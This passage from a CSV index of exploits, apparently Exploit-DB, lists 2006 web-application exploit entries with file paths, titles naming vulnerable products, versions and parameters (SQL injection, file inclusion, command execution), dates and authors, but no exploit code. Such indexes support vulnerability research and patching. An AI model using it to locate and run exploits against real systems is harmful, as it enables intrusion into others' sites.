Authentication Bypass",2006-02-06,Zodiac,webapps,asp, +1478,exploits/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution",2006-02-08,rgod,webapps,php, +1482,exploits/php/webapps/1482.php,"SPIP 1.8.2g - Remote Commands Execution",2006-02-08,rgod,webapps,php, +1484,exploits/php/webapps/1484.php,"FCKEditor 2.0 < 2.2 - 'FileManager connector.php' Arbitrary File Upload",2006-02-09,rgod,webapps,php, +1485,exploits/php/webapps/1485.php,"RunCMS 1.2 - 'class.forumposts.php' Remote File Inclusion",2006-02-09,rgod,webapps,php, +1491,exploits/php/webapps/1491.php,"DocMGR 0.54.2 - 'file_exists' Remote Commands Execution",2006-02-11,rgod,webapps,php, +1492,exploits/php/webapps/1492.php,"Invision Power Board Army System Mod 2.1 - SQL Injection",2006-02-13,fRoGGz,webapps,php, +1493,exploits/php/webapps/1493.php,"EnterpriseGS 1.0 rc4 - Remote Commands Execution",2006-02-13,rgod,webapps,php, +1494,exploits/php/webapps/1494.php,"FlySpray 0.9.7 - 'install-0.9.7.php' Remote Commands Execution",2006-02-13,rgod,webapps,php, +1498,exploits/php/webapps/1498.php,"webSPELL 4.01 - 'title_op' SQL Injection",2006-02-14,x128,webapps,php, +1499,exploits/php/webapps/1499.pl,"MyBulletinBoard (MyBB) 1.03 - Multiple SQL Injections",2006-02-15,"HACKERS PAL",webapps,php, +1501,exploits/php/webapps/1501.php,"PHPKIT 1.6.1R2 - 'filecheck' Remote Commands Execution",2006-02-16,rgod,webapps,php, +1503,exploits/php/webapps/1503.pl,"YapBB 1.2 - 'cfgIncludeDirectory' Remote Command Execution",2006-02-16,cijfer,webapps,php, +1508,exploits/cgi/webapps/1508.pl,"AWStats < 6.4 - 'referer' Remote Command Execution",2006-02-17,RusH,webapps,cgi, +1509,exploits/php/webapps/1509.pl,"Zorum Forum 3.5 - 'rollid' SQL Injection",2006-02-17,RusH,webapps,php, +1510,exploits/php/webapps/1510.pl,"Gravity Board X 1.1 - 'csscontent' Remote Code Execution",2006-02-17,RusH,webapps,php, +1511,exploits/php/webapps/1511.php,"Coppermine Photo Gallery 1.4.3 - Remote Commands Execution",2006-02-17,rgod,webapps,php, +1512,exploits/php/webapps/1512.pl,"Admbook 1.2.2 - 'x-forwarded-for' Remote Command Execution",2006-02-19,rgod,webapps,php, +1513,exploits/php/webapps/1513.php,"BXCP 0.2.9.9 - 'tid' SQL Injection",2006-02-19,x128,webapps,php, +1514,exploits/asp/webapps/1514.pl,"MiniNuke 1.8.2b - 'pages.asp' SQL Injection",2006-02-19,nukedx,webapps,asp, +1515,exploits/php/webapps/1515.pl,"GeekLog 1.x - 'error.log' (gpc = Off) Remote Commands Execution",2006-02-20,rgod,webapps,php, +1516,exploits/php/webapps/1516.php,"ilchClan 1.05g - 'tid' SQL Injection",2006-02-20,x128,webapps,php, +1521,exploits/php/webapps/1521.php,"Noahs Classifieds 1.3 - 'lowerTemplate' Remote Code Execution",2006-02-22,trueend5,webapps,php, +1522,exploits/php/webapps/1522.php,"NOCC Webmail 1.0 - Local File Inclusion / Remote Code Execution",2006-02-23,rgod,webapps,php, +1523,exploits/php/webapps/1523.cpp,"PHP-Nuke 7.5 < 7.8 - 'Search' SQL Injection",2006-02-23,unitedbr,webapps,php, +1524,exploits/php/webapps/1524.html,"VHCS 2.4.7.1 - Add User Authentication Bypass",2006-02-23,RoMaNSoFt,webapps,php, +1525,exploits/php/webapps/1525.pl,"phpWebSite 0.10.0-full - 'topics.php' SQL Injection",2006-02-24,SnIpEr_SA,webapps,php, +1526,exploits/php/webapps/1526.php,"Lansuite 2.1.0 Beta - 'fid' SQL Injection",2006-02-24,x128,webapps,php, +1527,exploits/php/webapps/1527.pl,"iGENUS WebMail 2.0.2 - 'config_inc.php' Remote Code Execution",2006-02-25,rgod,webapps,php, +1528,exploits/asp/webapps/1528.pl,"Pentacle In-Out Board 6.03 - 'newsdetailsview' SQL Injection",2006-02-25,nukedx,webapps,asp, +1529,exploits/asp/webapps/1529.html,"Pentacle In-Out Board 6.03 - 'login.asp' Remote Authentication Bypass",2006-02-25,nukedx,webapps,asp, +1530,exploits/php/webapps/1530.pl,"saPHP Lesson 2.0 - 'forumid' SQL Injection",2006-02-25,SnIpEr_SA,webapps,php, +1532,exploits/php/webapps/1532.pl,"PwsPHP 1.2.3 - 'index.php' SQL Injection",2006-02-25,papipsycho,webapps,php, +1533,exploits/php/webapps/1533.php,"4Images 1.7.1 - Local File Inclusion / Remote Code Execution",2006-02-26,rgod,webapps,php, +1538,exploits/php/webapps/1538.pl,"Farsinews 2.5 - Directory Traversal Arbitrary 'users.db' Access",2006-02-28,Hessam-x,webapps,php, +1539,exploits/php/webapps/1539.txt,"MyBulletinBoard (MyBB) 1.03 - 'misc.php' SQL Injection",2006-02-28,Devil-00,webapps,php, +1541,exploits/php/webapps/1541.pl,"Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution",2006-03-01,str0ke,webapps,php, +1542,exploits/php/webapps/1542.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (1)",2006-03-01,LorD,webapps,php, +1543,exploits/php/webapps/1543.pl,"vuBB 0.2 Final - 'cookie' SQL Injection",2006-03-01,KingOfSka,webapps,php, +1544,exploits/php/webapps/1544.pl,"Woltlab Burning Board 2.x - Datenbank MOD 'fileid' SQL Injection",2006-03-01,nukedx,webapps,php, +1546,exploits/php/webapps/1546.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (2)",2006-03-02,cijfer,webapps,php, +1547,exploits/php/webapps/1547.txt,"Aztek Forum 4.00 - Cross-Site Scripting / SQL Injection",2006-03-02,lorenzo,webapps,php, +1548,exploits/php/webapps/1548.pl,"MyBulletinBoard (MyBB) 1.04 - 'misc.php' SQL Injection (2)",2006-03-03,Devil-00,webapps,php, +1549,exploits/php/webapps/1549.php,"PHP-Stats 0.1.9.1 - Remote Commands Execution",2006-03-04,rgod,webapps,php, +1550,exploits/asp/webapps/1550.txt,"TotalECommerce 1.0 - 'index.asp?id' SQL Injection",2006-03-04,nukedx,webapps,asp, +1553,exploits/php/webapps/1553.pl,"Fantastic News 2.1.2 - 'script_path' Remote Code Execution",2006-03-04,uid0,webapps,php, +1556,exploits/php/webapps/1556.pl,"D2-Shoutbox 4.2 IPB Mod - 'load' SQL Injection",2006-03-06,SkOd,webapps,php, +1561,exploits/php/webapps/1561.pl,"OWL Intranet Engine 0.82 - 'xrms_file_root' Code Execution",2006-03-07,rgod,webapps,php, +1562,exploits/asp/webapps/1562.pl,"CilemNews System 1.1 - 'yazdir.asp' haber_id SQL Injection",2006-03-07,nukedx,webapps,asp, +1563,exploits/php/webapps/1563.pm,"Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution (Metasploit)",2006-03-07,sirh0t,webapps,php, +1566,exploits/php/webapps/1566.php,"Gallery 2.0.3 - stepOrder[] Remote Commands Execution",2006-03-08,rgod,webapps,php, +1567,exploits/php/webapps/1567.php,"RedBLoG 0.5 - 'cat_id' SQL Injection",2006-03-08,x128,webapps,php, +1569,exploits/asp/webapps/1569.pl,"d2kBlog 1.0.3 - 'memName' SQL Injection",2006-03-09,DevilBox,webapps,asp, +1570,exploits/php/webapps/1570.pl,"Light Weight Calendar 1.x - 'date' Remote Code Execution",2006-03-09,Hessam-x,webapps,php, +1571,exploits/asp/webapps/1571.html,"JiRos Banner Experience 1.0 - Unauthorised Create Admin",2006-03-09,nukedx,webapps,asp, +1575,exploits/php/webapps/1575.pl,"Guestbook Script 1.7 - 'include_files' Remote Code Execution",2006-03-11,rgod,webapps,php, +1576,exploits/php/webapps/1576.txt,"Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,Nomenumbra,webapps,php, +1581,exploits/php/webapps/1581.pl,"Simple PHP Blog 0.4.7.1 - Remote Command Execution",2006-03-13,rgod,webapps,php, +1585,exploits/php/webapps/1585.php,"PHP iCalendar 2.21 - 'cookie' Remote Code Execution",2006-03-15,rgod,webapps,php, +1586,exploits/php/webapps/1586.php,"PHP iCalendar 2.21 - 'publish.ical.php' Remote Code Execution",2006-03-15,rgod,webapps,php, +1587,exploits/php/webapps/1587.pl,"KnowledgebasePublisher 1.2 - 'Include' Remote Code Execution",2006-03-15,uid0,webapps,php, +1588,exploits/php/webapps/1588.php,"nodez 4.6.1.1 mercury - Multiple Vulnerabilities",2006-03-18,rgod,webapps,php, +1589,exploits/asp/webapps/1589.pl,"BetaParticle Blog 6.0 - 'fldGalleryID' SQL Injection",2006-03-18,nukedx,webapps,asp, +1590,exploits/php/webapps/1590.pl,"ShoutLIVE 1.1.0 - 'savesettings.php' Remote Code Execution",2006-03-18,DarkFig,webapps,php, +1594,exploits/php/webapps/1594.py,"SoftBB 0.1 - 'mail' Blind SQL Injection",2006-03-19,LOTFREE,webapps,php, +1595,exploits/php/webapps/1595.php,"gCards 1.45 - Multiple Vulnerabilities",2006-03-20,rgod,webapps,php, +1597,exploits/asp/webapps/1597.pl,"ASPPortal 3.1.1 - 'downloadid' SQL Injection",2006-03-20,nukedx,webapps,asp, +1600,exploits/php/webapps/1600.php,"FreeWPS 2.11 - 'images.php' Remote Code Execution",2006-03-21,x128,webapps,php, +1605,exploits/php/webapps/1605.php,"XHP CMS 0.5 - 'upload' Remote Command Execution",2006-03-22,rgod,webapps,php, +1608,exploits/php/webapps/1608.php,"WebAlbum 2.02pl - COOKIE[skin2] Remote Code Execution",2006-03-25,rgod,webapps,php, +1609,exploits/php/webapps/1609.pl,"PHP Ticket 0.71 - 'search.php' SQL Injection",2006-03-25,undefined1_,webapps,php, +1610,exploits/php/webapps/1610.txt,"phpBookingCalendar 1.0c - 'details_view.php' SQL Injection",2006-03-25,undefined1_,webapps,php, +1611,exploits/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure",2006-03-25,undefined1_,webapps,php, +1612,exploits/php/webapps/1612.php,"CuteNews 1.4.1 - 'function.php' Local File Inclusion",2006-03-26,"Hamid Ebadi",webapps,php, +1616,exploits/php/webapps/1616.pl,"Aztek Forum 4.0 - 'myadmin.php' User Privilege Escalation",2006-03-26,Sparah,webapps,php, +1617,exploits/php/webapps/1617.php,"PHPCollab 2.x / NetOffice 2.x - 'sendpassword.php' SQL Injection",2006-03-28,rgod,webapps,php, +1618,exploits/php/webapps/1618.c,"GreyMatter WebLog 1.21d - Remote Command Execution (1)",2006-03-28,No_Face_King,webapps,php, +1619,exploits/php/webapps/1619.pl,"GreyMatter WebLog 1.21d - Remote Command Execution (2)",2006-03-28,Hessam-x,webapps,php, +1621,exploits/php/webapps/1621.php,"Plogger Beta 2.1 - Administrative Credentials Disclosure",2006-03-28,rgod,webapps,php, +1623,exploits/asp/webapps/1623.pl,"EzASPSite 2.0 RC3 - 'Scheme' SQL Injection",2006-03-29,nukedx,webapps,asp, +1627,exploits/php/webapps/1627.php,"Claroline 1.7.4 - 'scormExport.inc.php' Remote Code Execution",2006-03-30,rgod,webapps,php, +1629,exploits/php/webapps/1629.pl,"SQuery 4.5 - 'libpath' Remote File Inclusion",2006-04-01,uid0,webapps,php, +1630,exploits/php/webapps/1630.pl,"PHPNuke-Clan 3.0.1 - 'vwar_root2' Remote File Inclusion",2006-04-01,uid0,webapps,php, +1631,exploits/php/webapps/1631.php,"ReloadCMS 1.2.5 - Cross-Site Scripting / Remote Code Execution",2006-04-02,rgod,webapps,php, +1632,exploits/php/webapps/1632.pl,"VWar 1.5.0 R12 - Remote File Inclusion",2006-04-02,uid0,webapps,php, +1640,exploits/php/webapps/1640.pl,"AngelineCMS 0.8.1 - 'installpath' Remote File Inclusion",2006-04-04,K-159,webapps,php, +1644,exploits/php/webapps/1644.pl,"INDEXU 5.0.1 - 'base_path' Remote File Inclusion",2006-04-04,K-159,webapps,php, +1645,exploits/php/webapps/1645.pl,"Crafty Syntax Image Gallery 3.1g - Remote Code Execution",2006-04-04,undefined1_,webapps,php, +1646,exploits/php/webapps/1646.php,"phpMyChat 0.14.5 - SYS enter Remote Code Execution",2006-04-05,rgod,webapps,php, +1647,exploits/php/webapps/1647.php,"phpMyChat 0.15.0dev - SYS enter Remote Code Execution",2006-04-06,rgod,webapps,php, +1650,exploits/php/webapps/1650.pl,"Horde Help Viewer 3.1 - Remote Command Execution",2006-04-07,deese,webapps,php, +1652,exploits/php/webapps/1652.php,"ADODB < 4.70 (PHPOpenChat 3.0.x) - 'Server.php' SQL Injection",2006-04-09,rgod,webapps,php, +1653,exploits/php/webapps/1653.txt,"dnGuestbook 2.0 - SQL Injection",2006-04-09,snatcher,webapps,php, +1654,exploits/php/webapps/1654.txt,"autonomous lan party 0.98.1.0 - Remote File Inclusion",2006-04-09,Codexploder,webapps,php, +1655,exploits/php/webapps/1655.php,"XBrite Members 1.1 - 'id' SQL Injection",2006-04-09,snatcher,webapps,php, +1656,exploits/php/webapps/1656.txt,"Sire 2.0 - '/lire.php' Remote File Inclusion / Arbitrary File Upload",2006-04-09,simo64,webapps,php, +1659,exploits/php/webapps/1659.php,"phpList 2.10.2 - GLOBALS[] Remote Code Execution",2006-04-10,rgod,webapps,php, +1660,exploits/php/webapps/1660.pm,"Horde 3.0.9/3.1.0 - Help Viewer Remote Code Execution (Metasploit)",2006-04-10,Inkubus,webapps,php, +1661,exploits/php/webapps/1661.pl,"phpBB 2.0.19 - 'user_sig_bbcode_uid' Remote Code Execution",2006-04-10,RusH,webapps,php, +1662,exploits/php/webapps/1662.php,"Clansys 1.1 (showid) - SQL Injection",2006-04-10,snatcher,webapps,php, +1663,exploits/php/webapps/1663.php,"Simplog 0.9.2 - 's' Remote Commands Execution",2006-04-11,rgod,webapps,php, +1665,exploits/php/webapps/1665.pl,"Sphider 1.3 - 'configset.php' Remote File Inclusion",2006-04-12,rgod,webapps,php, +1666,exploits/php/webapps/1666.php,"PHP121 Instant Messenger 1.4 - Remote Code Execution",2006-04-12,rgod,webapps,php, +1668,exploits/php/webapps/1668.php,"vBulletin ImpEx 1.74 - Remote Command Execution",2006-04-13,ReZEN,webapps,php, +1669,exploits/cgi/webapps/1669.pl,"Censtore 7.3.x - 'censtore.cgi' Remote Command Execution",2006-04-13,FOX_MULDER,webapps,cgi, +1670,exploits/cgi/webapps/1670.pl,"quizz 1.01 - 'quizz.pl' Remote Command Execution",2006-04-13,FOX_MULDER,webapps,cgi, +1672,exploits/php/webapps/1672.pl,"PAJAX 0.5.1 - Remote Code Execution",2006-04-13,Stoney,webapps,php, +1673,exploits/php/webapps/1673.php,"phpWebSite 0.10.2 - 'hub_dir' Remote Commands Execution",2006-04-14,rgod,webapps,php, +1674,exploits/php/webapps/1674.txt,"osCommerce 2.2 - 'extras' Source Code Disclosure",2006-04-14,rgod,webapps,php, +1677,exploits/cgi/webapps/1677.php,"SysInfo 1.21 - 'sysinfo.cgi' Remote Command Execution",2006-04-14,rgod,webapps,cgi, +1678,exploits/php/webapps/1678.php,"PHP Album 0.3.2.3 - Remote Command Execution",2006-04-15,rgod,webapps,php, +1680,exploits/cgi/webapps/1680.pm,"Symantec Sygate Management Server - 'LOGIN' SQL Injection (Metasploit)",2006-04-15,Nicob,webapps,cgi, +1682,exploits/php/webapps/1682.php,"Fuju News 1.0 - Authentication Bypass / SQL Injection",2006-04-16,snatcher,webapps,php, +1683,exploits/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - SQL Injection",2006-04-16,snatcher,webapps,php, +1686,exploits/php/webapps/1686.pl,"FlexBB 0.5.5 - '/inc/start.php?_COOKIE' SQL Bypass",2006-04-17,Devil-00,webapps,php, +1687,exploits/php/webapps/1687.txt,"MyEvent 1.3 - 'event.php' Remote File Inclusion",2006-04-17,botan,webapps,php, +1694,exploits/php/webapps/1694.pl,"Internet PhotoShow 1.3 - 'page' Remote File Inclusion",2006-04-18,Hessam-x,webapps,php, +1695,exploits/php/webapps/1695.pl,"PHP Net Tools 2.7.1 - Remote Code Execution",2006-04-18,FOX_MULDER,webapps,php, +1697,exploits/php/webapps/1697.php,"PCPIN Chat 5.0.4 - 'login/language' Remote Code Execution",2006-04-19,rgod,webapps,php, +1698,exploits/php/webapps/1698.php,"Joomla! 1.0.7 / Mambo 4.5.3 - 'feed' Full Path Disclosure / Denial of Service",2006-04-19,trueend5,webapps,php, +1699,exploits/php/webapps/1699.txt,"RechnungsZentrale V2 < 1.1.3 - Remote File Inclusion",2006-04-19,"GroundZero Security",webapps,php, +1700,exploits/asp/webapps/1700.pl,"ASPSitem 1.83 - 'Haberler.asp' SQL Injection",2006-04-19,nukedx,webapps,asp, +1701,exploits/php/webapps/1701.php,"PHPSurveyor 0.995 - 'surveyid' Remote Command Execution",2006-04-20,rgod,webapps,php, +1704,exploits/php/webapps/1704.pl,"CoreNews 2.0.1 - 'userid' SQL Injection",2006-04-21,nukedx,webapps,php, +1705,exploits/php/webapps/1705.pl,"Simplog 0.9.3 - 'tid' SQL Injection",2006-04-21,nukedx,webapps,php, +1706,exploits/php/webapps/1706.txt,"dForum 1.5 - 'DFORUM_PATH' Multiple Remote File Inclusions",2006-04-21,nukedx,webapps,php, +1707,exploits/php/webapps/1707.pl,"My Gaming Ladder Combo System 7.0 - Remote Code Execution",2006-04-22,nukedx,webapps,php, +1710,exploits/php/webapps/1710.txt,"Clansys 1.1 - 'index.php' PHP Code Insertion",2006-04-23,nukedx,webapps,php, +1711,exploits/php/webapps/1711.txt,"Built2Go PHP Movie Review 2B - Remote File Inclusion",2006-04-23,"Camille Myers",webapps,php, +1713,exploits/php/webapps/1713.pl,"FlexBB 0.5.5 - '/function/showprofile.php' SQL Injection",2006-04-24,Devil-00,webapps,php, +1714,exploits/asp/webapps/1714.txt,"BK Forum 4.0 - 'member.asp' SQL Injection",2006-04-24,n0m3rcy,webapps,asp, +1720,exploits/php/webapps/1720.pl,"Invision Power Board 2.1.5 - 'lastdate' Remote Code Execution",2006-04-26,RusH,webapps,php, +1722,exploits/php/webapps/1722.txt,"TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (1)",2006-04-27,[Oo],webapps,php, +1723,exploits/php/webapps/1723.txt,"Advanced Guestbook 2.4.0 - 'phpBB' File Inclusion",2006-04-28,[Oo],webapps,php, +1724,exploits/php/webapps/1724.pl,"TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (2)",2006-04-28,FOX_MULDER,webapps,php, +1725,exploits/php/webapps/1725.pl,"Advanced Guestbook 2.4.0 - 'phpBB' Remote File Inclusion",2006-04-28,n0m3rcy,webapps,php, +1726,exploits/php/webapps/1726.pl,"Invision Power Board 2.1.5 - 'search.php' Remote Code Execution",2006-04-29,"Javier Olascoaga",webapps,php, +1727,exploits/php/webapps/1727.txt,"openPHPNuke 2.3.3 - Remote File Inclusion",2006-04-29,[Oo],webapps,php, +1728,exploits/php/webapps/1728.txt,"Knowledge Base Mod 2.0.2 - 'phpBB' Remote File Inclusion",2006-04-29,[Oo],webapps,php, +1729,exploits/php/webapps/1729.txt,"Limbo CMS 1.0.4.2 - 'sql.php' Remote File Inclusion",2006-04-29,[Oo],webapps,php, +1730,exploits/php/webapps/1730.txt,"Aardvark Topsites PHP 4.2.2 - 'path' Remote File Inclusion",2006-04-30,[Oo],webapps,php, +1731,exploits/php/webapps/1731.txt,"phpMyAgenda 3.0 Final - 'rootagenda' Remote File Inclusion",2006-04-30,Aesthetico,webapps,php, +1732,exploits/php/webapps/1732.pl,"Aardvark Topsites PHP 4.2.2 - 'lostpw.php' Remote File Inclusion",2006-04-30,cijfer,webapps,php, +1733,exploits/php/webapps/1733.pl,"Invision Power Board 2.1.5 - 'from_contact' SQL Injection",2006-05-01,"Ykstortion Security",webapps,php, +1738,exploits/php/webapps/1738.php,"X7 Chat 2.0 - 'help_file' Remote Command Execution",2006-05-02,rgod,webapps,php, +1740,exploits/php/webapps/1740.pl,"Fast Click 1.1.3/2.3.8 - 'show.php' Remote File Inclusion",2006-05-02,R@1D3N,webapps,php, +1744,exploits/php/webapps/1744.pl,"Albinator 2.0.6 - 'Config_rootdir' Remote File Inclusion",2006-05-03,webDEViL,webapps,php, +1747,exploits/php/webapps/1747.pl,"Auction 1.3m - 'phpbb_root_path' Remote File Inclusion",2006-05-04,webDEViL,webapps,php, +1751,exploits/php/webapps/1751.php,"Limbo CMS 1.0.4.2 - 'catid' SQL Injection",2006-05-05,[Oo],webapps,php, +1752,exploits/php/webapps/1752.pl,"StatIt 4 - 'statitpath' Remote File Inclusion",2006-05-05,IGNOR3,webapps,php, +1753,exploits/php/webapps/1753.txt,"TotalCalendar 2.30 - 'inc' Remote File Inclusion",2006-05-05,Aesthetico,webapps,php, +1755,exploits/cgi/webapps/1755.py,"AWStats 6.5 - 'migrate' Remote Shell Command Injection",2006-05-06,redsand,webapps,cgi, +1756,exploits/php/webapps/1756.pl,"HiveMail 1.3 - 'addressbook.add.php' Remote Code Execution",2006-05-06,[Oo],webapps,php, +1759,exploits/asp/webapps/1759.txt,"VP-ASP 6.00 - 'shopcurrency.asp' SQL Injection",2006-05-06,tracewar,webapps,asp, +1760,exploits/php/webapps/1760.php,"PHP-Fusion 6.00.306 - Multiple Vulnerabilities",2006-05-07,rgod,webapps,php, +1761,exploits/php/webapps/1761.pl,"Jetbox CMS 2.1 - 'relative_script_path' Remote File Inclusion",2006-05-07,beford,webapps,php, +1763,exploits/php/webapps/1763.txt,"ACal 2.2.6 - 'day.php' Remote File Inclusion",2006-05-07,PiNGuX,webapps,php, +1764,exploits/php/webapps/1764.txt,"EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion",2006-05-07,OLiBekaS,webapps,php, +1765,exploits/php/webapps/1765.pl,"Dokeos Lms 1.6.4 - 'authldap.php' Remote File Inclusion",2006-05-08,beford,webapps,php, +1766,exploits/php/webapps/1766.pl,"Claroline E-Learning 1.75 - 'ldap.inc.php' Remote File Inclusion",2006-05-08,beford,webapps,php, +1767,exploits/php/webapps/1767.txt,"ActualAnalyzer Server 8.23 - 'rf' Remote File Inclusion",2006-05-08,Aesthetico,webapps,php, +1768,exploits/php/webapps/1768.php,"ActualAnalyzer Pro 6.88 - 'rf' Remote File Inclusion",2006-05-08,ReZEN,webapps,php, +1769,exploits/php/webapps/1769.txt,"phpListPro 2.01 - Multiple Remote File Inclusions",2006-05-08,Aesthetico,webapps,php, +1773,exploits/php/webapps/1773.txt,"phpRaid 3.0.b3 - 'phpBB'/'SMF' Remote File Inclusion",2006-05-09,"Kurdish Security",webapps,php, +1774,exploits/php/webapps/1774.txt,"pafileDB 2.0.1 - 'mxBB'/'phpBB' Remote File Inclusion",2006-05-09,Darkfire,webapps,php, +1777,exploits/php/webapps/1777.php,"Unclassified NewsBoard 1.6.1 patch 1 - Local File Inclusion",2006-05-11,rgod,webapps,php, +1778,exploits/php/webapps/1778.txt,"Foing 0.7.0 - 'phpBB' Remote File Inclusion",2006-05-12,"Kurdish Security",webapps,php, +1779,exploits/php/webapps/1779.txt,"PHP Blue Dragon CMS 2.9 - Remote File Inclusion",2006-05-12,Kacper,webapps,php, +1780,exploits/php/webapps/1780.php,"phpBB 2.0.20 - Admin/Restore DB/default_lang Remote Command Execution",2006-05-13,rgod,webapps,php, +1785,exploits/php/webapps/1785.php,"Sugar Suite Open Source 4.2 - 'OptimisticLock' Command Execution",2006-05-14,rgod,webapps,php, +1789,exploits/php/webapps/1789.txt,"TR Newsportal 0.36tr1 - 'poll.php' Remote File Inclusion",2006-05-15,Kacper,webapps,php, +1790,exploits/php/webapps/1790.txt,"Squirrelcart 2.2.0 - 'cart_content.php' Remote File Inclusion",2006-05-15,OLiBekaS,webapps,php, +1793,exploits/php/webapps/1793.pl,"DeluxeBB 1.06 - 'name' SQL Injection (mq=off)",2006-05-15,KingOfSka,webapps,php, +1795,exploits/php/webapps/1795.txt,"ezusermanager 1.6 - Remote File Inclusion",2006-05-15,OLiBekaS,webapps,php, +1796,exploits/php/webapps/1796.php,"PHP-Fusion 6.00.306 - 'srch_where' SQL Injection",2006-05-16,rgod,webapps,php, +1797,exploits/php/webapps/1797.php,"DeluxeBB 1.06 - 'Attachment mod_mime' Remote Command Execution",2006-05-16,rgod,webapps,php, +1798,exploits/php/webapps/1798.txt,"Quezza BB 1.0 - 'quezza_root_path' File Inclusion",2006-05-17,nukedx,webapps,php, +1800,exploits/php/webapps/1800.txt,"ScozNews 1.2.1 - 'mainpath' Remote File Inclusion",2006-05-17,Kacper,webapps,php, +1804,exploits/php/webapps/1804.txt,"phpBazar 2.1.0 - Remote File Inclusion / Authentication Bypass",2006-05-19,[Oo],webapps,php, +1805,exploits/php/webapps/1805.pl,"phpListPro 2.0.1 - 'Language' Remote Code Execution",2006-05-19,[Oo],webapps,php, +1807,exploits/asp/webapps/1807.txt,"Zix Forum 1.12 - 'layid' SQL Injection",2006-05-19,FarhadKey,webapps,asp, +1808,exploits/php/webapps/1808.txt,"phpMyDirectory 10.4.4 - 'ROOT_PATH' Remote File Inclusion",2006-05-19,OLiBekaS,webapps,php, +1809,exploits/php/webapps/1809.txt,"CaLogic Calendars 1.2.2 - 'CLPath' Remote File Inclusion",2006-05-20,Kacper,webapps,php, +1810,exploits/php/webapps/1810.pl,"Woltlab Burning Board 2.3.5 - 'links.php' SQL Injection",2006-05-20,666,webapps,php, +1811,exploits/php/webapps/1811.php,"XOOPS 2.0.13.2 - 'xoopsOption[nocommon]' Remote Command Execution",2006-05-21,rgod,webapps,php, +1812,exploits/php/webapps/1812.pl,"Fusion News 1.0 (fil_config) - Remote File Inclusion",2006-05-21,X0r_1,webapps,php, +1814,exploits/php/webapps/1814.txt,"UBBCentral UBB.Threads 6.4.x < 6.5.2 - 'thispath' Remote File Inclusion",2006-05-22,V4mu,webapps,php, +1816,exploits/php/webapps/1816.php,"Nucleus CMS 3.22 - 'DIR_LIBS' Remote File Inclusion",2006-05-23,rgod,webapps,php, +1817,exploits/php/webapps/1817.txt,"Docebo 3.0.3 - Multiple Remote File Inclusions",2006-05-23,Kacper,webapps,php, +1818,exploits/php/webapps/1818.txt,"phpCommunityCalendar 4.0.3 - Cross-Site Scripting / SQL Injection",2006-05-23,X0r_1,webapps,php, +1821,exploits/php/webapps/1821.php,"Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution",2006-05-24,rgod,webapps,php, +1823,exploits/php/webapps/1823.txt,"BASE 1.2.4 - melissa Snort Frontend Remote File Inclusion",2006-05-25,str0ke,webapps,php, +1824,exploits/php/webapps/1824.txt,"open-medium.CMS 0.25 - '404.php' Remote File Inclusion",2006-05-25,Kacper,webapps,php, +1825,exploits/php/webapps/1825.txt,"Back-End CMS 0.7.2.2 - 'BE_config.php' Remote File Inclusion",2006-05-25,Kacper,webapps,php, +1826,exploits/php/webapps/1826.txt,"Socketmail 2.2.6 - 'site_path' Remote File Inclusion",2006-05-25,Aesthetico,webapps,php, +1827,exploits/php/webapps/1827.txt,"V-Webmail 1.6.4 - 'pear_dir' Remote File Inclusion",2006-05-25,beford,webapps,php, +1828,exploits/php/webapps/1828.txt,"DoceboLms 2.0.5 - 'help.php' Remote File Inclusion",2006-05-25,beford,webapps,php, +1829,exploits/php/webapps/1829.txt,"APC ActionApps CMS 2.8.1 - Remote File Inclusion",2006-05-25,Kacper,webapps,php, +1832,exploits/php/webapps/1832.txt,"Plume CMS 1.0.3 - 'manager_path' Remote File Inclusion",2006-05-26,beford,webapps,php, +1833,exploits/asp/webapps/1833.txt,"qjForum - 'member.asp' SQL Injection",2006-05-26,ajann,webapps,asp, +1834,exploits/asp/webapps/1834.asp,"Easy-Content Forums 1.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities",2006-05-26,ajann,webapps,asp, +1835,exploits/php/webapps/1835.txt,"Hot Open Tickets 11012004 - 'CLASS_PATH' Remote File Inclusion",2006-05-27,Kacper,webapps,php, +1836,exploits/asp/webapps/1836.txt,"PrideForum 1.0 - 'forum.asp' SQL Injection",2006-05-27,ajann,webapps,asp, +1837,exploits/asp/webapps/1837.pl,"MiniNuke 2.x - SQL Injection (Add Admin)",2006-05-27,nukedx,webapps,asp, +1839,exploits/php/webapps/1839.txt,"tinyBB 0.3 - Remote File Inclusion / SQL Injection",2006-05-28,nukedx,webapps,php, +1840,exploits/asp/webapps/1840.txt,"Enigma Haber 4.3 - Multiple SQL Injections",2006-05-28,nukedx,webapps,asp, +1841,exploits/php/webapps/1841.txt,"F@cile Interactive Web 0.8x - Remote File Inclusion / Cross-Site Scripting",2006-05-28,nukedx,webapps,php, +1842,exploits/php/webapps/1842.html,"EggBlog < 3.07 - Remote SQL Injection / Privilege Escalation",2006-05-28,nukedx,webapps,php, +1843,exploits/php/webapps/1843.txt,"UBBCentral UBB.Threads 5.x/6.x - Multiple Remote File Inclusions",2006-05-28,nukedx,webapps,php, +1844,exploits/php/webapps/1844.txt,"Activity MOD Plus 1.1.0 - 'phpBB Mod' File Inclusion",2006-05-28,nukedx,webapps,php, +1845,exploits/asp/webapps/1845.txt,"ASPSitem 2.0 - SQL Injection / Database Disclosure",2006-05-28,nukedx,webapps,asp, +1846,exploits/php/webapps/1846.txt,"Blend Portal 1.2.0 - 'phpBB Mod' Remote File Inclusion",2006-05-28,nukedx,webapps,php, +1847,exploits/php/webapps/1847.txt,"CosmicShoppingCart - 'search.php' SQL Injection",2006-05-28,Vympel,webapps,php, +1848,exploits/php/webapps/1848.txt,"Fastpublish CMS 1.6.9 - config[fsBase] Remote File Inclusion",2006-05-29,Kacper,webapps,php, +1849,exploits/asp/webapps/1849.html,"Speedy ASP Forum - 'profileupdate.asp' User Pass Change",2006-05-29,ajann,webapps,asp, +1850,exploits/asp/webapps/1850.html,"Nukedit 4.9.6 - Unauthorized Admin Add",2006-05-29,FarhadKey,webapps,asp, 